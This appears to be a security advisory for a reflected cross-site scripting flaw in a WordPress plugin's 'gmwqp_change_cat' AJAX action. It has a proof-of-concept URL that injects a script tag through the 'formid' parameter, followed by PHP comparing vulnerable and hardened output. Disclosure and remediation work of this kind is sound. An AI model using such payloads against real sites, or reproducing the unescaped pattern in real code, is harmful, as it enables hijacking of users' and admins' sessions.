The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting vulnerability which could be used against both unauthenticated and authenticated users (such as high-privilege ones like admins).
Have any unauthenticated or authenticated user (such as a logged-in admin) open the following URL:
https://example.com/wp-admin/admin-ajax.php?action=gmwqp_change_cat&option=taxonomy&formid="></select><script>alert(`xss`)</script>
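The missing sanitisation and escaping, shown as an added example that is not the plugin's own code: the vulnerable pattern beside a hardened one, run against the payload from the URL above. It assumes the formid value is echoed into a double-quoted attribute inside a select element, as the shape of the payload suggests; the function names, the markup and the allowed-character rule are hypothetical, and htmlspecialchars() stands in for WordPress's esc_attr() so the script runs without WordPress.

```php
<?php
// Added illustration, not the plugin's source. Function names and markup are hypothetical.

// Vulnerable pattern: the request value is concatenated into a double-quoted attribute.
function render_vulnerable(string $formid): string
{
    return '<select data-formid="' . $formid . '"><option>All</option></select>';
}

// Output escaping for an attribute context. In WordPress this is esc_attr();
// htmlspecialchars() stands in here so the script runs without WordPress.
function escape_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Input validation. Assumption: a form id needs only letters, digits, "_" and "-".
function clean_formid(string $raw): string
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $raw) === 1 ? $raw : '';
}

// Hardened pattern: validate on input, escape on output.
function render_hardened(string $formid): string
{
    return '<select data-formid="' . escape_attr(clean_formid($formid)) . '"><option>All</option></select>';
}

$samples = [
    'benign (constructed)'     => 'form_12',
    'payload from the PoC URL' => '"></select><script>alert(`xss`)</script>',
];

foreach ($samples as $label => $formid) {
    $before  = render_vulnerable($formid);
    $escaped = '<select data-formid="' . escape_attr($formid) . '">';
    $after   = render_hardened($formid);
    echo "== $label ==\n";
    echo "vulnerable:  $before\n";
    echo "escape only: $escaped\n";
    echo "hardened:    $after\n";
    // A live <script> tag in the output means the value broke out of its attribute.
    echo 'script tag in vulnerable output: ' . (strpos($before, '<script>') !== false ? 'yes' : 'no') . "\n";
    echo 'script tag in hardened output:   ' . (strpos($after, '<script>') !== false ? 'yes' : 'no') . "\n\n";
}
```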